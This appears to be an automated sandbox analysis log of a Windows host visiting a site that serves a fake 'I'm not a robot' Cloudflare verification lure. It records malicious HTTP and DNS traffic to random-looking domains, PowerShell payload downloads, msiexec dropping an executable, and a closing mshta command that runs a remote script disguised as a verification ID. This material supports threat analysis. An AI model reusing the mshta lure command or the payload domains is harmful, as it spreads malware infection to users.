__kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/Cyber-Threat-Intelligence.jpg HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/jsd/r/0.13947569542610058:1743546722:XhkVEFcVpPyR6yRfblILygkLVlr83O0qYD2eB3d9Uy8/929bd11d2dfa7ced HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/Incident-Response.jpg HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/cropped-favicon-32x32.png HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: servverifcloud.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /plu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: mfktiaoaolfkfjzjk.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /84.fqo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hitiotppppalfkjfk.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: ravinn.com
            Source: global trafficDNS traffic detected: DNS query: www.ravinn.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: pptpooalfkakktl.com
            Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
            Source: global trafficDNS traffic detected: DNS query: static.klaviyo.com
            Source: global trafficDNS traffic detected: DNS query: static-tracking.klaviyo.com
            Source: global trafficDNS traffic detected: DNS query: dajajkfifofjfklaiotjapp.com
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: servverifcloud.com
            Source: global trafficDNS traffic detected: DNS query: mfktiaoaolfkfjzjk.com
            Source: global trafficDNS traffic detected: DNS query: hitiotppppalfkjfk.com
            Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/jsd/r/0.13947569542610058:1743546722:XhkVEFcVpPyR6yRfblILygkLVlr83O0qYD2eB3d9Uy8/929bd11d2dfa7ced HTTP/1.1Host: www.ravinn.comConnection: keep-aliveContent-Length: 16538sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8sec-ch-ua-mobile: ?0Accept: */*Origin: https://www.ravinn.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.165.132:443 -> 192.168.2.16:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.16:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.16:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.27.152:443 -> 192.168.2.16:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.66.133:443 -> 192.168.2.16:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.27.152:443 -> 192.168.2.16:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.27.152:443 -> 192.168.2.16:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.130.133:443 -> 192.168.2.16:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.130.133:443 -> 192.168.2.16:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.16:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.66.133:443 -> 192.168.2.16:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.66.133:443 -> 192.168.2.16:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49803 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.16:49822 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.69.191:443 -> 192.168.2.16:49823 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.3.74:443 -> 192.168.2.16:49825 version: TLS 1.2

            System Summary

            barindex
            Source: C:\Windows\System32\msiexec.exeFile dump: launchultra.exe.18.dr 507847807Jump to dropped file
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6948_1511851748
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6ce13a.msi
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE263.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE2F1.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE340.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE370.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{E3205E05-7972-45C4-8321-B26BB5BCDBB2}
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE3DE.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6ce13d.msi
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6ce13d.msi
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6948_1511851748
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: classification engineClassification label: mal100.troj.evad.win@42/79@25/186
            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\2M32Q1FN
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeMutant created: NULL
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeMutant created: \Sessions\1\BaseNamedObjects\Avira.Security.Systray@abff403a-9b56-48e6-8753-10fb19692501
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\BISKVFCOWY
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4384:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_03
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\82c1709aac9f4369ad38604500b6d8d2
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Zuferssx
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0mjy5iq.2cs.ps1
            Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\svchost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1964,i,5450519922198028058,4023602434265028325,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1888 /prefetch:3
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ravinn.com"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1964,i,5450519922198028058,4023602434265028325,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1888 /prefetch:3
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://servverifcloud.com/ # I ?m not a robot: ?l?udflare V?rific?tion ID: 0?0-G??
